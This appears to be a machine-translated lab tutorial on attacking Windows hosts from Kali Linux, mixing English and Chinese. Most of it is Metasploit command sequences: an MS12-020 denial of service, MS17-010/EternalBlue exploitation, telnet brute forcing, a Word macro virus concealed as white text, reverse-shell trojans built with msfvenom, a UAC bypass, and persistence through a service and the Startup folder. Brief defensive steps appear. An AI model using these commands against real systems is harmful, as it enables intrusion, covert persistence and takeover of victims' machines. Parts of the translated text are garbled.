Related parameters
Kali's IP address is: 192.168.0.103/24
Win2003's IP address is: 192.168.0.138/24
(1) Blue screen attack
Principle: Use the defect of the operating system kernel to send a large number of data packets, this vulnerability may cause a denial of service attack or allow remote code execution
Prerequisite: The other party opens port 3389 and is only valid for certain operating systems
operating:
1. Scan
nmap -sS -O [IP地址] 或 nmap -sT [IP地址]
大家看着来啊!(我是比较习惯用这两个)
If you scan 03 without 3389, this port can be opened like me:
Scan again and you'll be
there
Start to penetrate:
1. Use auxiliary/scanner/rdp/ms12_020_check to check whether the other party has this vulnerability:
msf> msfconsole
msf> use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(scanner/rdp/ms12_020_check> set rhosts 192.168.0.138
msf auxiliary(scanner/rdp/ms12_020_check> run
2. Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids module to attack
root@kali:~#:msfconsole
msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhost 192.168.0.138
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
attacker
victim
How to protect it?
Above:
(right click on my computer——"Properties)
(Apply-OK)
Click
Advanced Firewall- "Settings-"Close Remote Desktop
Test again
Note: The other party did not open port 3386
(2) Port 445 penetration
Prerequisite: The other party has opened port 445.
Theory: A bit too much (scratch your head). You can check it by yourself (share it through the IPC$ backdoor).
Net share can view and share (IPC$ shared our disk)
If port 445 is not scanned, then open it (such as Picture)
1. Open the service and open the Server
2. CMD enter net share and
ask you if you want to open the service, then press Y
Start to penetrate
serach ms17 #可查看对应的模块
show options #可查看所需参数
root@kali:~#msfconsole
msf > use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > set rhost 192.168.0.138
msf exploit(windows/smb/ms17_010_psexec) > run
meterpreter> screenshot #(截图)
Screenshot saved to: /root/HlFTZjqL.jpeg
meterpreter >
Successful attack:
protection! It is to disable the Server service.
Example:
Stop-"Disable-"Apply -" OK
Penetrate again: I
found that I couldn't get in at all! ! !
(3) Telnet attack
Turn on our telnet service: the
startup type becomes automatic-"application-"OK-then start the service
for nmap scanning
nmap -sV -O [IP地址] || nmap -sT [IP地址]
You can see that port 23 of telnet is up
Use use auxiliary/scanner/telnet/telnet_login module to
start penetration
(1) msf module brute force cracking
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.0.138
rhosts => 192.168.0.138
msf auxiliary(scanner/telnet/telnet_login) > set pass_file ~/password.txt
msf auxiliary(scanner/telnet/telnet_login) > set USERNAME administrator
msf auxiliary(scanner/telnet/telnet_login) > run
Note: ~/password.txt is the password dictionary under ~ (can be generated
by yourself ) and the password is 14106821
After logging in through telnet
, we can perform operations such as privilege escalation
Two, hydra brute force cracking
-L 后为用户名
-P 后为密码
root@kali:~# hydra -L ~/user.txt -P ~/password.txt 192.168.43.123 telnet
192.168.43.123为IP地址
Use telnet to log in
(3) Macro virus
Prerequisite: There is an office
because there is no office in 2003, so I use win7 as an example
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.43.249 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
生成一堆代码
1.截取Sub Auto_Open() 到 End Sub
2.上图(大概就是从第一行的几个英文字符开始一直到最后
1. Create a new work document in win7 New-
"Open work-"View-"New macro
2. Paste our code 1 into the macro code
ctrl+s
3. Copy code 2 into word,
copy and adjust the color to white (the other party can't find it at all)
4. msf calls the module to respond
just finished writing, forgot to save, fuck , rewrite (I vomit)
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.105
msf exploit(multi/handler) > exploit
Successful penetration
(4) Trojan Horse Program
The
principle of using msfvenmon to generate is similar to the macro virus,
but I think it is more flexible
. 1. It can be made into a service (and then self-starting) as long as the kali is hung (the IP is unchanged (fixed IP is fine) (intranet)
2. In the self-starting folder
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.0.105 lport=4444 -f exe R > /var/www/html/shell.exe
How to upload a Trojan horse program!
1. 445 port brute force cracking and upload via ftp
2. drag directly
3. apache
4...
445 penetration
Use the exploit/windows/smb/ms17_010_eternalblue module for penetration (requires the other party to open 445)
usf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.113
rhost => 192.168.0.113
msf exploit(windows/smb/ms17_010_eternalblue) > run
445 Successful penetration
2.apache
cd /var/www/html
cp index.html index.html.bak //备份
rm index.html
/etc/init.d/apache restart
win7浏览器访问下载即可
Start to penetrate
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.105
msf exploit(multi/handler) > exploit
II.
Privilege escalation Here I use exploit/windows/local/bypassuac for privilege escalation operation
msf > use exploit/windows/local/bypassuac
msf exploit(windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > run
msf exploit(windows/local/bypassuac)> shell
meterpreter > getsystem //提权
meterpreter > shell
C:\Windows\system32> copy /d "C:\Users\win2007-1\Desktop\shell.exe" "C:\Windows\system32\shell.exe"
C:\Windows\system32> SC CREATE KJService binPath= "C:\windows\system32\shell.exe" START= auto DISPLAYNAME= "KJService nice" TYPE= own
C:\Windows\system32> net start KJService #将服务启动即可
Check whether it is
successful.
2. Start the file directory. The
same method of infiltration and privilege escalation as above
meterpreter > shell
C:\Windows\system32> copy /d "C:\Users\win2007-1\Desktop\shell.exe" "C:\Users\win2007-1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe"
View
Success!
Probably that's it, I will post a more detailed one in the future.
If anything is wrong, please advise, I am also Xiaobai